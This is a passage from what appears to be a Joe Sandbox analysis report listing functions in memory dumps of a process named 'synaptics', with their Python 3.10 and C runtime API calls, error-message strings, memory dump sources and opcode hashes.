                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: cannot convert '%.200s' object to bytes
                                                                                                                                                                                                      • API String ID: 0-2182073367
                                                                                                                                                                                                      • Opcode ID: 57045e792cea911c0ee97b5133985cc63dd44d1e1647ebf748ca218214cf1597
                                                                                                                                                                                                      • Instruction ID: ad09b520b9923e58acdcf6bc84ac058fe62a3c2c152e4cbcdcf8f3b2ebfbded8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57045e792cea911c0ee97b5133985cc63dd44d1e1647ebf748ca218214cf1597
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C1102727045105BCA04CA5AE802EE97365DBC127EB24013DE909CBFA4DB32EC5687D0
                                                                                                                                                                                                      Function 6C58ECB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E920,00000000,00000000,00000000,00000000), ref: 6C58ECED
                                                                                                                                                                                                      • PyObject_GetItem.PYTHON310(?,00000000), ref: 6C58ED38
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ItemObjectObject_
                                                                                                                                                                                                      • String ID: __main__$interpreter not initialized
                                                                                                                                                                                                      • API String ID: 1780401385-2179152150
                                                                                                                                                                                                      • Opcode ID: 16e93873dcdfd0057efe30f628c48c438e1c78e173e431f58b9f35f5cb5f79fc
                                                                                                                                                                                                      • Instruction ID: 299fa5444dcc24eb8ae88c27b4d95136d2734bdd57040bfaeb2fa5a287fac98f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16e93873dcdfd0057efe30f628c48c438e1c78e173e431f58b9f35f5cb5f79fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C11087774611017D210959AAC41F97B3A9DBC2275F190379EE1CCBBC0EA51EC0683E1
                                                                                                                                                                                                      Function 73A8A3F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 73A87E01: pDNameNode::pDNameNode.LIBCMT ref: 73A87E27
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A4B5
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8A4C3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name$Name::Name::operator+NodeNode::p
                                                                                                                                                                                                      • String ID: void$void
                                                                                                                                                                                                      • API String ID: 3257498322-3746155364
                                                                                                                                                                                                      • Opcode ID: 7711fbc7a2ef5792ce75b11ac91a3cada24c888dede0a7a33d1d9dbc3500a32b
                                                                                                                                                                                                      • Instruction ID: ae818b3553150a1a842fe1d88d62c2bc0724ef380461aae41e9aa62c7418391c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7711fbc7a2ef5792ce75b11ac91a3cada24c888dede0a7a33d1d9dbc3500a32b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20211D75800209AFDF06DF90C856BEE7BB8FF14300F50815BE556A7298EB756645CB50
                                                                                                                                                                                                      Function 6C4B1920 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyNumber_Index.PYTHON310(?), ref: 6C4B193E
                                                                                                                                                                                                      • _PyLong_Copy.PYTHON310(00000000), ref: 6C4B1958
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,6C4B1A5A), ref: 6C4B19A2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • slice indices must be integers or None or have an __index__ method, xrefs: 6C4B198D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CopyErr_IndexLong_Number_Object
                                                                                                                                                                                                      • String ID: slice indices must be integers or None or have an __index__ method
                                                                                                                                                                                                      • API String ID: 2095862572-4115508390
                                                                                                                                                                                                      • Opcode ID: b1403c0bbb4577079af3eccfab8051c77875e3bab947eb22a39e597d6a4252d4
                                                                                                                                                                                                      • Instruction ID: a264eb3091c7fd0e2ad9cff8f234ddeb57b2dde79b2a2f3d967ac8452c89f552
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1403c0bbb4577079af3eccfab8051c77875e3bab947eb22a39e597d6a4252d4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09110172B012115BD310CAA9AC41F9773E8AF4123AF1403B5E928DBBE1E771ED11C2E6
                                                                                                                                                                                                      Function 6C566D70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?), ref: 6C566DA8
                                                                                                                                                                                                      • PyDict_SetItemString.PYTHON310(?,__doc__,00000000), ref: 6C566DBD
                                                                                                                                                                                                      • PyErr_NewException.PYTHON310(?,?,?), ref: 6C566DE7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Dict_Err_ExceptionFromItemUnicode_
                                                                                                                                                                                                      • String ID: __doc__
                                                                                                                                                                                                      • API String ID: 2360001856-918073949
                                                                                                                                                                                                      • Opcode ID: 9dbd465ac9ba102e8a767772174d5854882899457a0f149dab2a5542986a7a15
                                                                                                                                                                                                      • Instruction ID: cb87ccbd9a973ff02f4a130136daa489eb96cf9dfb7393b18ec6fd7242aac755
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbd465ac9ba102e8a767772174d5854882899457a0f149dab2a5542986a7a15
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8511C172A013169BD7109EAAED81D8777B8AF84678B050335F918C7F61DB31DC2587E1
                                                                                                                                                                                                      Function 6C5B7E70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(?), ref: 6C5B7E80
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromUnicode_
                                                                                                                                                                                                      • String ID: @Btl
                                                                                                                                                                                                      • API String ID: 2011613304-3323547406
                                                                                                                                                                                                      • Opcode ID: f89f7a6c95c6875f8c550d5acb66e9cb2cd8379c69d5aaba37da1b55a127be3f
                                                                                                                                                                                                      • Instruction ID: f2e1d32c65e96426fba0ade10766e41f7e244c383ebb60de39cae08629bd0bb9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f89f7a6c95c6875f8c550d5acb66e9cb2cd8379c69d5aaba37da1b55a127be3f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F411E7316001005BC6209A79AC10DAB7BA59F813B97148335F82CD7FA0D730ED56C6E2
                                                                                                                                                                                                      Function 6C4EE990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(PyUnicode_InternImmortal() is deprecated; use PyUnicode_InternInPlace() instead), ref: 6C4EE9A3
                                                                                                                                                                                                        • Part of subcall function 6C4D2B20: _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,6C44F059,?), ref: 6C4D2B5A
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(00000000,00000000), ref: 6C4EEA01
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?), ref: 6C4EEA0D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyUnicode_InternImmortal() is deprecated; use PyUnicode_InternInPlace() instead, xrefs: 6C4EE99E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_StringUnicode_$FromInternPlaceUnraisableWrite
                                                                                                                                                                                                      • String ID: PyUnicode_InternImmortal() is deprecated; use PyUnicode_InternInPlace() instead
                                                                                                                                                                                                      • API String ID: 2728583663-2074581235
                                                                                                                                                                                                      • Opcode ID: 714b9a603cdc6c8add05876827d85a98d06d0792ec78856773365d600b985281
                                                                                                                                                                                                      • Instruction ID: a3c84331d47d9967c4627b8da50fc08f70ac356ae918f6d15a91913f5837b242
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 714b9a603cdc6c8add05876827d85a98d06d0792ec78856773365d600b985281
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1111E971B4061087C724CA59DC42F9673E1AFC533AF160329E9798B7D0DB61E942C7C1
                                                                                                                                                                                                      Function 6C494E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromString.PYTHON310(?,?,?), ref: 6C494E38
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON310(?,?), ref: 6C494E74
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(invalid literal for int() with base %d: %.200R,?,00000000), ref: 6C494E91
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • invalid literal for int() with base %d: %.200R, xrefs: 6C494E86
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromString$Bytes_Err_FormatLong_Size
                                                                                                                                                                                                      • String ID: invalid literal for int() with base %d: %.200R
                                                                                                                                                                                                      • API String ID: 3207205198-2598097594
                                                                                                                                                                                                      • Opcode ID: ff5147650fc430125f943383d4d0b1250c54fbe8f2f82beba4acd41aa07c6bc0
                                                                                                                                                                                                      • Instruction ID: 97ac703a8fff43f25e08ed880dfc25151e7ae217ec3b9299263c5fe477ddf557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff5147650fc430125f943383d4d0b1250c54fbe8f2f82beba4acd41aa07c6bc0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB11C472A01115ABDB10CE6AEC00CAB7BE8EF81279F144364E828C7750E735DD55C7D0
                                                                                                                                                                                                      Function 6C4809E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(could not convert string to float: %R,?), ref: 6C480A22
                                                                                                                                                                                                      • PyOS_string_to_double.PYTHON310(?,?,00000000), ref: 6C480A5B
                                                                                                                                                                                                      • PyFloat_FromDouble.PYTHON310 ref: 6C480A94
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • could not convert string to float: %R, xrefs: 6C480A17
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DoubleErr_Float_FormatFromS_string_to_double
                                                                                                                                                                                                      • String ID: could not convert string to float: %R
                                                                                                                                                                                                      • API String ID: 3304884639-2485491468
                                                                                                                                                                                                      • Opcode ID: 6a82f397d933833e1ea0191a4cd04b506946a729c35c23d11fc058c37f7114e6
                                                                                                                                                                                                      • Instruction ID: bb0932e29889a67d5b1589c6f828db9d79c2b97a690e0cc25cdbbbf6eefd86d2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a82f397d933833e1ea0191a4cd04b506946a729c35c23d11fc058c37f7114e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76117B3153B2889BCB12EE24DC40FAC3BB4AF92759F0806AEEC8556D11EB35C494C7C2
                                                                                                                                                                                                      Function 6C476D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long), ref: 6C476D4A
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C476D6E
                                                                                                                                                                                                      • PyDict_GetItem.PYTHON310(?,00000000), ref: 6C476D82
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ClearDict_ItemString
                                                                                                                                                                                                      • String ID: input too long
                                                                                                                                                                                                      • API String ID: 2509392938-2786935005
                                                                                                                                                                                                      • Opcode ID: d67a9d8a93cff01d7ec9e968622f08e4799071f4d21ba8996a3af4de03e96534
                                                                                                                                                                                                      • Instruction ID: 2acdeb626569f2e637c816be211b2ff9ccb7624bc47a033efefd23c1bbbf9b33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d67a9d8a93cff01d7ec9e968622f08e4799071f4d21ba8996a3af4de03e96534
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02010872B5011457CA20C969AD06EC677AA8B8637AF144374EC589BBD0EA21691AC2E2
                                                                                                                                                                                                      Function 6C492E50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,000004DE), ref: 6C492E7C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\longobject.c, xrefs: 6C492E6B
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C492E70
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
